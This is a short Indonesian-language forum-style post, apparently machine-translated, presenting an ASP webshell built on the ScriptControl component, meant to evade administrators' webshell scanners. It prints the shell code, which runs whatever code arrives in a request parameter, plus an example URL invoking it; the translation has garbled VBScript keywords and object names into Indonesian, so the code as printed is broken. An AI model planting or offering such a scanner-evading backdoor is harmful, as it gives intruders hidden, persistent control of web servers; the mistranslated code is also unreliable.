Saya selalu penasaran, mengapa ada eval atau eksekusi di klien? Di mana pun saya bersembunyi, administrator dapat menendang saya menggunakan pemindai webshell XX apa pun. Hari ini saya meneliti ulang komponen ScriptControl di VB dan menemukan bahwa itu juga bisa dipanggil di asp. Saya mempelajari metodenya dan kemudian mendiskusikannya dengan lcx. Saya mendapat kode berikut. Saya ingin mengucapkan terima kasih kepada senior saya atas bimbingannya, haha.
Kodenya sangat sederhana, jadi saya tidak akan menjelaskannya terlalu banyak untuk menghindari orang memarahi saya karena berpura-pura.
Copy kode kodenya sebagai berikut:
<%
Setel o = Server.CreateObject(ScriptControl)
o.bahasa = vbscript
o.addcode(Request(SubCode)) 'Parameter SubCode sebagai kode proses
o.jalankan e,Server,Respon,Permintaan,Aplikasi,Sesi,Kesalahan 'Panggil dengan nama parameter e, dan dorong 6 objek dasar sebagai parameter secara bersamaan
'Contoh panggilan:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Respon,Permintaan,Aplikasi,Sesi,Kesalahan%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
%>
Perhatikan bahwa meskipun dapat digunakan, percobaan menemukan bahwa hanya klien lake2 yang dapat digunakan. Saya harap seseorang bisa keluar dan membuatnya lebih umum. hehe. Ini juga merupakan ide bagus untuk menulis klien khusus Anda sendiri.